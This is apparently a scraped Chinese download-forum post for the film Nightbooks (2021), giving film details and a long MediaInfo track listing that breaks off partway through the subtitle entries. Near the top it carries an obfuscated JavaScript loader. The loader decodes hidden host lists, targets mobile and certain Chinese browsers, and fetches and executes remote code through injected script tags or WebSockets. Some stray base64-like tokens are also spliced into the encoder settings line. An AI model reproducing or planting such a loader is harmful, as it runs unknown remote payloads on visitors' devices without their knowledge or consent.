夜读惊魂[国语配音/中文字幕].Nightbooks.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264 15.19GB

版主小s 1月前 255

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 夜读惊魂 / 恐怖睡前故事(港)

◎片 名 Nightbooks

◎年 代 2021

◎产 地 美国

◎类 别 家庭

◎语 言 英语

◎上映日期 2021-09-15(美国)

◎IMDb链接 https://www.imdb.com/title/tt10521144/

◎豆瓣链接 https://movie.douban.com/subject/35288672/

◎导 演 大卫·雅洛维斯基 David Yarovesky (id:1402488)

◎编 剧 托拜厄斯·伊康尼斯 Tobias Iaconis (id:1406744)

米琪·多特里 Mikki Daughtry (id:1406743)

◎演 员 克里斯滕·里特 Krysten Ritter (id:1036308)

莉娅·朱厄特 Lidya Jewett (id:1384424)

温斯洛·费格雷 Winslow Fegley (id:1430169)

◎标 签 奇幻 / 恐怖 / 女巫 / 美国 / 网飞 / 儿童 / 电影 / 美剧

◎简 介

喜爱恐怖故事的小男孩艾力克斯必须每晚说一个惊悚童话,否则便会和新认识的朋友被永久禁锢在邪恶女巫的魔法公寓里。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 89086096757908772145252406637318874136 (0x43055BAEE595455C1B1A67AA127BA418)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 15.2 GiB

  8. Duration : 1 h 43 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 21.1 Mb/s

  11. Encoded date : UTC 2021-09-16 10:55:00

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 43 min

  24. Bit rate mode : Variable

  25. Bit rate : 3 008 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 23.976 (24000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.061

  37. Stream size : 2.17 GiB (14%)

  38. Writing library : x264 core 148 r2724 dbe0335

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=20.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 1 h 43 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 567 MiB (4%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 1 h 43 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 472 MiB (3%)

  81. Title : Arabic

  82. Language : Arabic

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 1 h 43 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 472 MiB (3%)

  101. Title : Croatian

  102. Language : Croatian

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 1 h 43 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 472 MiB (3%)

  121. Title : Czech

  122. Language : Czech

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Audio #5

  127. ID : 6

  128. Format : E-AC-3

  129. Format/Info : Enhanced AC-3

  130. Commercial name : Dolby Digital Plus

  131. Codec ID : A_EAC3

  132. Duration : 1 h 43 min

  133. Bit rate mode : Constant

  134. Bit rate : 640 kb/s

  135. Channel(s) : 6 channels

  136. Channel layout : L R C LFE Ls Rs

  137. Sampling rate : 48.0 kHz

  138. Frame rate : 31.250 FPS (1536 SPF)

  139. Compression mode : Lossy

  140. Stream size : 472 MiB (3%)

  141. Title : Danish

  142. Language : Danish

  143. Service kind : Complete Main

  144. Default : No

  145. Forced : No


  146. Audio #6

  147. ID : 7

  148. Format : E-AC-3

  149. Format/Info : Enhanced AC-3

  150. Commercial name : Dolby Digital Plus

  151. Codec ID : A_EAC3

  152. Duration : 1 h 43 min

  153. Bit rate mode : Constant

  154. Bit rate : 640 kb/s

  155. Channel(s) : 6 channels

  156. Channel layout : L R C LFE Ls Rs

  157. Sampling rate : 48.0 kHz

  158. Frame rate : 31.250 FPS (1536 SPF)

  159. Compression mode : Lossy

  160. Stream size : 472 MiB (3%)

  161. Title : Dutch

  162. Language : Dutch

  163. Service kind : Complete Main

  164. Default : No

  165. Forced : No


  166. Audio #7

  167. ID : 8

  168. Format : E-AC-3

  169. Format/Info : Enhanced AC-3

  170. Commercial name : Dolby Digital Plus

  171. Codec ID : A_EAC3

  172. Duration : 1 h 43 min

  173. Bit rate mode : Constant

  174. Bit rate : 640 kb/s

  175. Channel(s) : 6 channels

  176. Channel layout : L R C LFE Ls Rs

  177. Sampling rate : 48.0 kHz

  178. Frame rate : 31.250 FPS (1536 SPF)

  179. Compression mode : Lossy

  180. Stream size : 472 MiB (3%)

  181. Title : Finnish

  182. Language : Finnish

  183. Service kind : Complete Main

  184. Default : No

  185. Forced : No


  186. Audio #8

  187. ID : 9

  188. Format : E-AC-3

  189. Format/Info : Enhanced AC-3

  190. Commercial name : Dolby Digital Plus

  191. Codec ID : A_EAC3

  192. Duration : 1 h 43 min

  193. Bit rate mode : Constant

  194. Bit rate : 640 kb/s

  195. Channel(s) : 6 channels

  196. Channel layout : L R C LFE Ls Rs

  197. Sampling rate : 48.0 kHz

  198. Frame rate : 31.250 FPS (1536 SPF)

  199. Compression mode : Lossy

  200. Stream size : 472 MiB (3%)

  201. Title : French

  202. Language : French

  203. Service kind : Complete Main

  204. Default : No

  205. Forced : No


  206. Audio #9

  207. ID : 10

  208. Format : E-AC-3

  209. Format/Info : Enhanced AC-3

  210. Commercial name : Dolby Digital Plus

  211. Codec ID : A_EAC3

  212. Duration : 1 h 43 min

  213. Bit rate mode : Constant

  214. Bit rate : 640 kb/s

  215. Channel(s) : 6 channels

  216. Channel layout : L R C LFE Ls Rs

  217. Sampling rate : 48.0 kHz

  218. Frame rate : 31.250 FPS (1536 SPF)

  219. Compression mode : Lossy

  220. Stream size : 472 MiB (3%)

  221. Title : German

  222. Language : German

  223. Service kind : Complete Main

  224. Default : No

  225. Forced : No


  226. Audio #10

  227. ID : 11

  228. Format : E-AC-3

  229. Format/Info : Enhanced AC-3

  230. Commercial name : Dolby Digital Plus

  231. Codec ID : A_EAC3

  232. Duration : 1 h 43 min

  233. Bit rate mode : Constant

  234. Bit rate : 640 kb/s

  235. Channel(s) : 6 channels

  236. Channel layout : L R C LFE Ls Rs

  237. Sampling rate : 48.0 kHz

  238. Frame rate : 31.250 FPS (1536 SPF)

  239. Compression mode : Lossy

  240. Stream size : 472 MiB (3%)

  241. Title : Greek

  242. Language : Greek

  243. Service kind : Complete Main

  244. Default : No

  245. Forced : No


  246. Audio #11

  247. ID : 12

  248. Format : E-AC-3

  249. Format/Info : Enhanced AC-3

  250. Commercial name : Dolby Digital Plus

  251. Codec ID : A_EAC3

  252. Duration : 1 h 43 min

  253. Bit rate mode : Constant

  254. Bit rate : 640 kb/s

  255. Channel(s) : 6 channels

  256. Channel layout : L R C LFE Ls Rs

  257. Sampling rate : 48.0 kHz

  258. Frame rate : 31.250 FPS (1536 SPF)

  259. Compression mode : Lossy

  260. Stream size : 472 MiB (3%)

  261. Title : Hebrew

  262. Language : Hebrew

  263. Service kind : Complete Main

  264. Default : No

  265. Forced : No


  266. Audio #12

  267. ID : 13

  268. Format : E-AC-3

  269. Format/Info : Enhanced AC-3

  270. Commercial name : Dolby Digital Plus

  271. Codec ID : A_EAC3

  272. Duration : 1 h 43 min

  273. Bit rate mode : Constant

  274. Bit rate : 640 kb/s

  275. Channel(s) : 6 channels

  276. Channel layout : L R C LFE Ls Rs

  277. Sampling rate : 48.0 kHz

  278. Frame rate : 31.250 FPS (1536 SPF)

  279. Compression mode : Lossy

  280. Stream size : 472 MiB (3%)

  281. Title : Hindi

  282. Language : Hindi

  283. Service kind : Complete Main

  284. Default : No

  285. Forced : No


  286. Audio #13

  287. ID : 14

  288. Format : E-AC-3

  289. Format/Info : Enhanced AC-3

  290. Commercial name : Dolby Digital Plus

  291. Codec ID : A_EAC3

  292. Duration : 1 h 43 min

  293. Bit rate mode : Constant

  294. Bit rate : 640 kb/s

  295. Channel(s) : 6 channels

  296. Channel layout : L R C LFE Ls Rs

  297. Sampling rate : 48.0 kHz

  298. Frame rate : 31.250 FPS (1536 SPF)

  299. Compression mode : Lossy

  300. Stream size : 472 MiB (3%)

  301. Title : Hungarian

  302. Language : Hungarian

  303. Service kind : Complete Main

  304. Default : No

  305. Forced : No


  306. Audio #14

  307. ID : 15

  308. Format : E-AC-3

  309. Format/Info : Enhanced AC-3

  310. Commercial name : Dolby Digital Plus

  311. Codec ID : A_EAC3

  312. Duration : 1 h 43 min

  313. Bit rate mode : Constant

  314. Bit rate : 640 kb/s

  315. Channel(s) : 6 channels

  316. Channel layout : L R C LFE Ls Rs

  317. Sampling rate : 48.0 kHz

  318. Frame rate : 31.250 FPS (1536 SPF)

  319. Compression mode : Lossy

  320. Stream size : 472 MiB (3%)

  321. Title : Indonesian

  322. Language : Indonesian

  323. Service kind : Complete Main

  324. Default : No

  325. Forced : No


  326. Audio #15

  327. ID : 16

  328. Format : E-AC-3

  329. Format/Info : Enhanced AC-3

  330. Commercial name : Dolby Digital Plus

  331. Codec ID : A_EAC3

  332. Duration : 1 h 43 min

  333. Bit rate mode : Constant

  334. Bit rate : 640 kb/s

  335. Channel(s) : 6 channels

  336. Channel layout : L R C LFE Ls Rs

  337. Sampling rate : 48.0 kHz

  338. Frame rate : 31.250 FPS (1536 SPF)

  339. Compression mode : Lossy

  340. Stream size : 472 MiB (3%)

  341. Title : Italian

  342. Language : Italian

  343. Service kind : Complete Main

  344. Default : No

  345. Forced : No


  346. Audio #16

  347. ID : 17

  348. Format : E-AC-3

  349. Format/Info : Enhanced AC-3

  350. Commercial name : Dolby Digital Plus

  351. Codec ID : A_EAC3

  352. Duration : 1 h 43 min

  353. Bit rate mode : Constant

  354. Bit rate : 640 kb/s

  355. Channel(s) : 6 channels

  356. Channel layout : L R C LFE Ls Rs

  357. Sampling rate : 48.0 kHz

  358. Frame rate : 31.250 FPS (1536 SPF)

  359. Compression mode : Lossy

  360. Stream size : 472 MiB (3%)

  361. Title : Japanese

  362. Language : Japanese

  363. Service kind : Complete Main

  364. Default : No

  365. Forced : No


  366. Audio #17

  367. ID : 18

  368. Format : E-AC-3

  369. Format/Info : Enhanced AC-3

  370. Commercial name : Dolby Digital Plus

  371. Codec ID : A_EAC3

  372. Duration : 1 h 43 min

  373. Bit rate mode : Constant

  374. Bit rate : 640 kb/s

  375. Channel(s) : 6 channels

  376. Channel layout : L R C LFE Ls Rs

  377. Sampling rate : 48.0 kHz

  378. Frame rate : 31.250 FPS (1536 SPF)

  379. Compression mode : Lossy

  380. Stream size : 472 MiB (3%)

  381. Title : Korean

  382. Language : Korean

  383. Service kind : Complete Main

  384. Default : No

  385. Forced : No


  386. Audio #18

  387. ID : 19

  388. Format : E-AC-3

  389. Format/Info : Enhanced AC-3

  390. Commercial name : Dolby Digital Plus

  391. Codec ID : A_EAC3

  392. Duration : 1 h 43 min

  393. Bit rate mode : Constant

  394. Bit rate : 640 kb/s

  395. Channel(s) : 6 channels

  396. Channel layout : L R C LFE Ls Rs

  397. Sampling rate : 48.0 kHz

  398. Frame rate : 31.250 FPS (1536 SPF)

  399. Compression mode : Lossy

  400. Stream size : 472 MiB (3%)

  401. Title : Mandarin

  402. Language : Chinese

  403. Service kind : Complete Main

  404. Default : No

  405. Forced : No


  406. Audio #19

  407. ID : 20

  408. Format : E-AC-3

  409. Format/Info : Enhanced AC-3

  410. Commercial name : Dolby Digital Plus

  411. Codec ID : A_EAC3

  412. Duration : 1 h 43 min

  413. Bit rate mode : Constant

  414. Bit rate : 640 kb/s

  415. Channel(s) : 6 channels

  416. Channel layout : L R C LFE Ls Rs

  417. Sampling rate : 48.0 kHz

  418. Frame rate : 31.250 FPS (1536 SPF)

  419. Compression mode : Lossy

  420. Stream size : 472 MiB (3%)

  421. Title : Norwegian

  422. Language : Norwegian

  423. Service kind : Complete Main

  424. Default : No

  425. Forced : No


  426. Audio #20

  427. ID : 21

  428. Format : E-AC-3

  429. Format/Info : Enhanced AC-3

  430. Commercial name : Dolby Digital Plus

  431. Codec ID : A_EAC3

  432. Duration : 1 h 43 min

  433. Bit rate mode : Constant

  434. Bit rate : 640 kb/s

  435. Channel(s) : 6 channels

  436. Channel layout : L R C LFE Ls Rs

  437. Sampling rate : 48.0 kHz

  438. Frame rate : 31.250 FPS (1536 SPF)

  439. Compression mode : Lossy

  440. Stream size : 472 MiB (3%)

  441. Title : Polish

  442. Language : Polish

  443. Service kind : Complete Main

  444. Default : No

  445. Forced : No


  446. Audio #21

  447. ID : 22

  448. Format : E-AC-3

  449. Format/Info : Enhanced AC-3

  450. Commercial name : Dolby Digital Plus

  451. Codec ID : A_EAC3

  452. Duration : 1 h 43 min

  453. Bit rate mode : Constant

  454. Bit rate : 640 kb/s

  455. Channel(s) : 6 channels

  456. Channel layout : L R C LFE Ls Rs

  457. Sampling rate : 48.0 kHz

  458. Frame rate : 31.250 FPS (1536 SPF)

  459. Compression mode : Lossy

  460. Stream size : 472 MiB (3%)

  461. Title : Portuguese

  462. Language : Portuguese

  463. Service kind : Complete Main

  464. Default : No

  465. Forced : No


  466. Audio #22

  467. ID : 23

  468. Format : E-AC-3

  469. Format/Info : Enhanced AC-3

  470. Commercial name : Dolby Digital Plus

  471. Codec ID : A_EAC3

  472. Duration : 1 h 43 min

  473. Bit rate mode : Constant

  474. Bit rate : 640 kb/s

  475. Channel(s) : 6 channels

  476. Channel layout : L R C LFE Ls Rs

  477. Sampling rate : 48.0 kHz

  478. Frame rate : 31.250 FPS (1536 SPF)

  479. Compression mode : Lossy

  480. Stream size : 472 MiB (3%)

  481. Title : Brazilian Portuguese

  482. Language : Portuguese

  483. Service kind : Complete Main

  484. Default : No

  485. Forced : No


  486. Audio #23

  487. ID : 24

  488. Format : E-AC-3

  489. Format/Info : Enhanced AC-3

  490. Commercial name : Dolby Digital Plus

  491. Codec ID : A_EAC3

  492. Duration : 1 h 43 min

  493. Bit rate mode : Constant

  494. Bit rate : 640 kb/s

  495. Channel(s) : 6 channels

  496. Channel layout : L R C LFE Ls Rs

  497. Sampling rate : 48.0 kHz

  498. Frame rate : 31.250 FPS (1536 SPF)

  499. Compression mode : Lossy

  500. Stream size : 472 MiB (3%)

  501. Title : Romanian

  502. Language : Romanian

  503. Service kind : Complete Main

  504. Default : No

  505. Forced : No


  506. Audio #24

  507. ID : 25

  508. Format : E-AC-3

  509. Format/Info : Enhanced AC-3

  510. Commercial name : Dolby Digital Plus

  511. Codec ID : A_EAC3

  512. Duration : 1 h 43 min

  513. Bit rate mode : Constant

  514. Bit rate : 640 kb/s

  515. Channel(s) : 6 channels

  516. Channel layout : L R C LFE Ls Rs

  517. Sampling rate : 48.0 kHz

  518. Frame rate : 31.250 FPS (1536 SPF)

  519. Compression mode : Lossy

  520. Stream size : 472 MiB (3%)

  521. Title : Russian

  522. Language : Russian

  523. Service kind : Complete Main

  524. Default : No

  525. Forced : No


  526. Audio #25

  527. ID : 26

  528. Format : E-AC-3

  529. Format/Info : Enhanced AC-3

  530. Commercial name : Dolby Digital Plus

  531. Codec ID : A_EAC3

  532. Duration : 1 h 43 min

  533. Bit rate mode : Constant

  534. Bit rate : 640 kb/s

  535. Channel(s) : 6 channels

  536. Channel layout : L R C LFE Ls Rs

  537. Sampling rate : 48.0 kHz

  538. Frame rate : 31.250 FPS (1536 SPF)

  539. Compression mode : Lossy

  540. Stream size : 472 MiB (3%)

  541. Title : Spanish

  542. Language : Spanish

  543. Service kind : Complete Main

  544. Default : No

  545. Forced : No


  546. Audio #26

  547. ID : 27

  548. Format : E-AC-3

  549. Format/Info : Enhanced AC-3

  550. Commercial name : Dolby Digital Plus

  551. Codec ID : A_EAC3

  552. Duration : 1 h 43 min

  553. Bit rate mode : Constant

  554. Bit rate : 640 kb/s

  555. Channel(s) : 6 channels

  556. Channel layout : L R C LFE Ls Rs

  557. Sampling rate : 48.0 kHz

  558. Frame rate : 31.250 FPS (1536 SPF)

  559. Compression mode : Lossy

  560. Stream size : 472 MiB (3%)

  561. Title : European Spanish

  562. Language : Spanish

  563. Service kind : Complete Main

  564. Default : No

  565. Forced : No


  566. Audio #27

  567. ID : 28

  568. Format : E-AC-3

  569. Format/Info : Enhanced AC-3

  570. Commercial name : Dolby Digital Plus

  571. Codec ID : A_EAC3

  572. Duration : 1 h 43 min

  573. Bit rate mode : Constant

  574. Bit rate : 640 kb/s

  575. Channel(s) : 6 channels

  576. Channel layout : L R C LFE Ls Rs

  577. Sampling rate : 48.0 kHz

  578. Frame rate : 31.250 FPS (1536 SPF)

  579. Compression mode : Lossy

  580. Stream size : 472 MiB (3%)

  581. Title : Swedish

  582. Language : Swedish

  583. Service kind : Complete Main

  584. Default : No

  585. Forced : No


  586. Audio #28

  587. ID : 29

  588. Format : E-AC-3

  589. Format/Info : Enhanced AC-3

  590. Commercial name : Dolby Digital Plus

  591. Codec ID : A_EAC3

  592. Duration : 1 h 43 min

  593. Bit rate mode : Constant

  594. Bit rate : 640 kb/s

  595. Channel(s) : 6 channels

  596. Channel layout : L R C LFE Ls Rs

  597. Sampling rate : 48.0 kHz

  598. Frame rate : 31.250 FPS (1536 SPF)

  599. Compression mode : Lossy

  600. Stream size : 472 MiB (3%)

  601. Title : Turkish

  602. Language : Turkish

  603. Service kind : Complete Main

  604. Default : No

  605. Forced : No


  606. Text #1

  607. ID : 30

  608. Format : UTF-8

  609. Codec ID : S_TEXT/UTF8

  610. Codec ID/Info : UTF-8 Plain Text

  611. Duration : 1 h 35 min

  612. Bit rate : 79 b/s

  613. Count of elements : 1514

  614. Stream size : 55.9 KiB (0%)

  615. Title : English

  616. Language : English

  617. Default : Yes

  618. Forced : No


  619. Text #2

  620. ID : 31

  621. Format : UTF-8

  622. Codec ID : S_TEXT/UTF8

  623. Codec ID/Info : UTF-8 Plain Text

  624. Duration : 1 h 40 min

  625. Bit rate : 71 b/s

  626. Count of elements : 1129

  627. Stream size : 52.1 KiB (0%)

  628. Title : Arabic

  629. Language : Arabic

  630. Default : No

  631. Forced : No


  632. Text #3

  633. ID : 32

  634. Format : UTF-8

  635. Codec ID : S_TEXT/UTF8

  636. Codec ID/Info : UTF-8 Plain Text

  637. Duration : 1 h 40 min

  638. Bit rate : 43 b/s

  639. Count of elements : 1095

  640. Stream size : 31.7 KiB (0%)

  641. Title : Chinese Simplified

  642. Language : Chinese

  643. Default : No

  644. Forced : No


  645. Text #4

  646. ID : 33

  647. Format : UTF-8

  648. Codec ID : S_TEXT/UTF8

  649. Codec ID/Info : UTF-8 Plain Text

  650. Duration : 1 h 40 min

  651. Bit rate : 40 b/s

  652. Count of elements : 1091

  653. Stream size : 30.0 KiB (0%)

  654. Title : Chinese Traditional

  655. Language : Chinese

  656. Default : No

  657. Forced : No


  658. Text #5

  659. ID : 34

  660. Format : UTF-8

  661. Codec ID : S_TEXT/UTF8

  662. Codec ID/Info : UTF-8 Plain Text

  663. Duration : 1 h 40 min

  664. Bit rate : 33 b/s

  665. Count of elements : 1014

  666. Stream size : 24.7 KiB (0%)

  667. Title : Croatian

  668. Language : Croatian

  669. Default : No

  670. Forced : No


  671. Text #6

  672. ID : 35

  673. Format : UTF-8

  674. Codec ID : S_TEXT/UTF8

  675. Codec ID/Info : UTF-8 Plain Text

  676. Duration : 1 h 40 min

  677. Bit rate : 37 b/s

  678. Count of elements : 1051

  679. Stream size : 27.6 KiB (0%)

  680. Title : Czech

  681. Language : Czech

  682. Default : No

  683. Forced : No


  684. Text #7

  685. ID : 36

  686. Format : UTF-8

  687. Codec ID : S_TEXT/UTF8

  688. Codec ID/Info : UTF-8 Plain Text

  689. Duration : 1 h 40 min

  690. Bit rate : 37 b/s

  691. Count of elements : 923

  692. Stream size : 27.8 KiB (0%)

  693. Title : Danish

  694. Language : Danish

  695. Default : No

  696. Forced : No


  697. Text #8

  698. ID : 37

  699. Format : UTF-8

  700. Codec ID : S_TEXT/UTF8

  701. Codec ID/Info : UTF-8 Plain Text

  702. Duration : 1 h 40 min

  703. Bit rate : 35 b/s

  704. Count of elements : 991

  705. Stream size : 26.3 KiB (0%)

  706. Title : Dutch

  707. Language : Dutch

  708. Default : No

  709. Forced : No


  710. Text #9

  711. ID : 38

  712. Format : UTF-8

  713. Codec ID : S_TEXT/UTF8

  714. Codec ID/Info : UTF-8 Plain Text

  715. Duration : 1 h 40 min

  716. Bit rate : 37 b/s

  717. Count of elements : 789

  718. Stream size : 27.2 KiB (0%)

  719. Title : Finnish

  720. Language : Finnish

  721. Default : No

  722. Forced : No


  723. Text #10

  724. ID : 39

  725. Format : UTF-8

  726. Codec ID : S_TEXT/UTF8

  727. Codec ID/Info : UTF-8 Plain Text

  728. Duration : 1 h 40 min

  729. Bit rate : 34 b/s

  730. Count of elements : 923

  731. Stream size : 25.6 KiB (0%)

  732. Title : French

  733. Language : French

  734. Default : No

  735. Forced : No


  736. Text #11

  737. ID : 40

  738. Format : UTF-8

  739. Codec ID : S_TEXT/UTF8

  740. Codec ID/Info : UTF-8 Plain Text

  741. Duration : 1 h 40 min

  742. Bit rate : 34 b/s

  743. Count of elements : 1030

  744. Stream size : 25.4 KiB (0%)

  745. Title : German

  746. Language : German

  747. Default : No

  748. Forced : No


  749. Text #12

  750. ID : 41

  751. Format : UTF-8

  752. Codec ID : S_TEXT/UTF8

  753. Codec ID/Info : UTF-8 Plain Text

  754. Duration : 1 h 40 min

  755. Bit rate : 61 b/s

  756. Count of elements : 1056

  757. Stream size : 45.4 KiB (0%)

  758. Title : Greek

  759. Language : Greek

  760. Default : No

  761. Forced : No


  762. Text #13

  763. ID : 42

  764. Format : UTF-8

  765. Codec ID : S_TEXT/UTF8

  766. Codec ID/Info : UTF-8 Plain Text

  767. Duration : 1 h 40 min

  768. Bit rate : 63 b/s

  769. Count of elements : 1073

  770. Stream size : 46.8 KiB (0%)

  771. Title : Hebrew

  772. Language : Hebrew

  773. Default : No

  774. Forced : No


  775. Text #14

  776. ID : 43

  777. Format : UTF-8

  778. Codec ID : S_TEXT/UTF8

  779. Codec ID/Info : UTF-8 Plain Text

  780. Duration : 1 h 40 min

  781. Bit rate : 118 b/s

  782. Count of elements : 1097

  783. Stream size : 86.6 KiB (0%)

  784. Title : Hindi

  785. Language : Hindi

  786. Default : No

  787. Forced : No


  788. Text #15

  789. ID : 44

  790. Format : UTF-8

  791. Codec ID : S_TEXT/UTF8

  792. Codec ID/Info : UTF-8 Plain Text

  793. Duration : 1 h 40 min

  794. Bit rate : 36 b/s

  795. Count of elements : 1069

  796. Stream size : 26.5 KiB (0%)

  797. Title : Hungarian

  798. Language : Hungarian

  799. Default : No

  800. Forced : No


  801. Text #16

  802. ID : 45

  803. Format : UTF-8

  804. Codec ID : S_TEXT/UTF8

  805. Codec ID/Info : UTF-8 Plain Text

  806. Duration : 1 h 40 min

  807. Bit rate : 37 b/s

  808. Count of elements : 1093

  809. Stream size : 27.2 KiB (0%)

  810. Title : Indonesian

  811. Language : Indonesian

  812. Default : No

  813. Forced : No


  814. Text #17

  815. ID : 46

  816. Format : UTF-8

  817. Codec ID : S_TEXT/UTF8

  818. Codec ID/Info : UTF-8 Plain Text

  819. Duration : 1 h 40 min

  820. Bit rate : 37 b/s

  821. Count of elements : 878

  822. Stream size : 27.7 KiB (0%)

  823. Title : Italian

  824. Language : Italian

  825. Default : No

  826. Forced : No


  827. Text #18

  828. ID : 47

  829. Format : UTF-8

  830. Codec ID : S_TEXT/UTF8

  831. Codec ID/Info : UTF-8 Plain Text

  832. Duration : 1 h 40 min

  833. Bit rate : 43 b/s

  834. Count of elements : 1047

  835. Stream size : 32.0 KiB (0%)

  836. Title : Japanese

  837. Language : Japanese

  838. Default : No

  839. Forced : No


  840. Text #19

  841. ID : 48

  842. Format : UTF-8

  843. Codec ID : S_TEXT/UTF8

  844. Codec ID/Info : UTF-8 Plain Text

  845. Duration : 1 h 40 min

  846. Bit rate : 52 b/s

  847. Count of elements : 1097

  848. Stream size : 38.4 KiB (0%)

  849. Title : Korean

  850. Language : Korean

  851. Default : No

  852. Forced : No


  853. Text #20

  854. ID : 49

  855. Format : UTF-8

  856. Codec ID : S_TEXT/UTF8

  857. Codec ID/Info : UTF-8 Plain Text

  858. Duration : 1 h 40 min

  859. Bit rate : 40 b/s

  860. Count of elements : 1075

  861. Stream size : 29.6 KiB (0%)

  862. Title : Malay

  863. Language : Malay

  864. Default : No

  865. Forced : No


  866. Text #21

  867. ID : 50

  868. Format : UTF-8

  869. Codec ID : S_TEXT/UTF8

  870. Codec ID/Info : UTF-8 Plain Text

  871. Duration : 1 h 40 min

